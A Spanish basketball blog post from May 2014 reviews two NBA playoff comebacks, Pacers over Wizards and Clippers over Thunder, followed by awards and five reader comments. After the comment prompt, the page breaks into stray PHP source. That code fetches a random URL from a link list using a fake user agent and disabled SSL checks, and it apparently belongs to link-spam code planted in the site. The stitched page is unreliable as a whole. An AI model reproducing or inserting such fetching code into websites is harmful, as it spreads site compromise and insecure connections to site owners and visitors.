La Crónica: Comebacks

12 de May de 2014 por txusma

No sabemos quien si las prometía más felices al término de la primera parte, Thunder o Wizards, pero lo que sí sabemos es que ambos acabaron mordiendo el polvo.

En Washington, los Wizards acumularon una ventaja de 19 puntos al principio del tercer cuarto gracias sobretodo a su trio de jugadores veteranos. Andre Miller, Drew Gooden y Al Harrington dejaron en ridículo la 2ª unidad de los Pacers en un segundo cuarto en el que anotaron 15 puntos y capturaron 11 rebotes entre los 3. Los locales contralaban el partido y castigaban todas las pérdidas de los Pacers con rápidísimos contrataques que finalizaban en canasta. Sin embargo, el partido cambió radicalmente en la 2ª parte de la mano de Paul George, autor de 29 puntos en este periodo. De repente, los Wizards eran incapaces de contener a los jugadores de Indiana, Paul George se escurría una y otra vez de la vigilancia de Trevor Ariza para clavar triple tras triple y Roy Hibbert campaba a sus anchas por ambas zonas. Al inicio del último cuarto el duelo de 2ª unidades se volvía a decantar a favor de los locales pero los titulares de Indiana rápidamente pusieron las cosas en su sitio. El final del partido fue un despropósito, con una pérdida de George Hill a falta de 20 segundos, una canasta fallada por Bradley Beal totalmente solo tras robar el balón a Stephenson y tiros libres fallados por ambas partes. Entre tanto caos prevalecieron los visitantes, que ayer contaron con un jugador nivel MVP entre sus filas (95-92). La serie se pone 3-1 y el siguiente partido se juega en Indiana, que ha recuperado de golpe las buenas sensaciones de principio de curso. Casi imposible que se les escapen las finales de conferencia.

Más dura fue la caida de los Thunder que llegaron a ganar de 22 puntos durante el primer cuarto del partido. Durante 3 cuartos y medio los Clippers no encontraron solución para parar a Kevin Durant y Russell Westbrook pero a falta de 9 minutos para el final y con los Clippers 16 abajo el plan defensivo que había puesto en marcha Doc Rivers a mediados del tercer cuarto acabó funcionando. Con un quinteto pequeño y veloz y Chris Paul sobre Kevin Durant, los locales consiguieron remontar en apenas 6 minutos. El ajuste defensivo fue clave, Paul sujetó al MVP de la temporada y recibió grandísimas ayudas de sus compañeros que se tradujeron en 0 puntos de Durant durante ese periodo. Mientras, la otra canasta era atacada una y otra vez por Blake Griffin, Darren Collison y el mismo Chris Paul y la diferencia se evaporó en un santiamén. A pesar de los esfuerzos de Durant y Westbrook, la propia inercia del partido y el calor de su público llevó en volandas a los Clippers a la victoria. Collison, que anotó 2 canastas claves en el último minuto, acabó certificando la victoria de los suyos (99-101). Ocasión de oro perdida por los Thunder. El marcador de la eliminatoria registra un 2-2 pero el golpe moral puede haber sido importante. 

PREMIOS

MVP: Paul George recordó a ese jugador de principio de temporada que entraba en las apuestas por el MVP. Acabó el partido con 39 puntos, 12 rebotes y 7 de 10 en tiros de 3 lo que iguala el récord de la franquicia en un partido de playoffs.

Sorpresa: Vaya, vaya con los abuelos de los Wizards. Andre Miller (38), Drew Gooden (32) y Al Harrington (34) acabaron el partido con 28 puntos, 13 rebotes y 6 asistencias. Comparadlo con los números de la 2ª unidad de los Pacers…

Decepción: De los 95 puntos de los Pacers sólo 2 fueron anotados por un jugador del banquillo. Patético.

Esfuerzo en vano: De nuevo, el de Kevin Durant y Russell Westbrook. El MVP de la temporada se fue a los 40 puntos mientras que su escudero mantuvo la línea de anteriores partidos de playoffs y terminó con 27 puntos, 6 rebotes, 8 asistencias y 3 robos.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. rumbero dice:
    #1

    Si el partido de Paul no fue para MVP muy cerca estuvo. 23-10, 4 robos y 1 pérdida, su defensa sobre Durant y aguantando al equipo y metiendo 3 canastas seguidas cuando los Clippers estaban a punto de arrojar la toalla.

    Luego está el repaso de Rivers a Scott Brooks. Quito a Jordan para jugar small ball + pongo a Paul sobre Durant + Collison apretando a un Westbrook con 5 faltas = Colapso total en OKL. Ni una sola respuesta, todos los últimos ataques igual. Incapaces de liberar a Durant y obligados a tenérsela que jugar con la versión de Westbrook que no nos gusta. Buena oportunidad han dejado escapar los Thunder…en San Antonio que se lo estarán mirando la mar de contentos

      Citar

  2. Tobal dice:
    #2

    Yo tengo la sensación,que esta eliminatoria se la acabará llevando los Clippers,pues tienen más profundidad de banquillo,aparte de un gran quinteto titular,son muy buenos.

      Citar

  3. Ruxixon dice:
    #3

    Me parece absolutamente increible que Chris Paul se haya puesto a defender a Durant y que haya sido eficaz en esa tarea,aunque era “una medida desesperada” como ha dicho Doc Rivers (que ha reaccionado bien quitando a Jordan ante el small ball de los Thunder y dando más bola a Granger).Eso si,me parece que el propio Durant se ha hecho “pequeño” porque tenía delante un jugador del status de CP3.

    No sé,quiero ver que esta serie da un vuelco de nuevo con el empujón anímico de la remontada de esta noche,pero lo cierto es que Oklahoma está siendo superior con Durant y sobre todo un Westbrook absolutamente aplastante.

    Banquillos libres: Knicks,Lakers,Detroit,Golden State,Utah,Minnesota y…Cleveland,que ha despedido a Mike Brown.Apuesto a que Jackson tiene equipo el año que viene (mismamente Cleveland me da el pego)

      Citar

  4. GreenPride dice:
    #4

    Efectivamente de nuevo Rivers inventando en Playoffs para salvar a su equipo demostrando que desde el banquillo se puede influir decisivamente en los resultados. Copió una fórmula que ya valió a sus Celtics contra los Cavs de LeBron donde puso a Rondo sobre el Rey, poniendo a CP3 sobre Durant. Durant no vió bola gracias en parte a que los Thunder no tuvieron paciencia (hay Westbrook tuvo parte de culpa) para meterle dentro y buscar las bolas en la pintura. Los Clippers consiguieron revolucionar el tempo del partido y colapsar a OKC y completaron una remontada milagrosa. Gran subidón moral para los de LA.
    La serie se pone emocionante aunque hay que decir que quitando esta remontada final OKC se ha mostrado bastante superior en los 3 últimos partidos disputados. Veremos si esta remontada cambia el rumbo de la serie o si es agua en el desierto para los Clippers.
    En el Este Indiana parece que recupera sensaciones de la mano de sus dos jugadores decisivos. Con Hibbert volviendo a ser importante y Paul George recuperando puntería y galones, los Pacers han ganado los dos partidos en la capital y ya miran de cara a las finales de conferencia donde se encontrarían de nuevo a los Heat tal como están las cosas. Entonces veremos si de verdad están recuperados como para dar guerra de verdad. El momento que llevan esperando desde el año pasado casi ha llegado y con la ventaja campo que ellos creían fundamental. Sin embargo por sensaciones los de MIami parecen favoritos. Esperemos a que ambos cierren sus eliminatorias y preparémonos para ver si hay batalla de verdad

      Citar

  5. Jose Luis dice:
    #5

    Otro comeback, esta vez de los Thunder

    Mi madre, vaya final de partido de Paul… 2 pérdidas y 1 falta de 3 TL en 17 segundos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>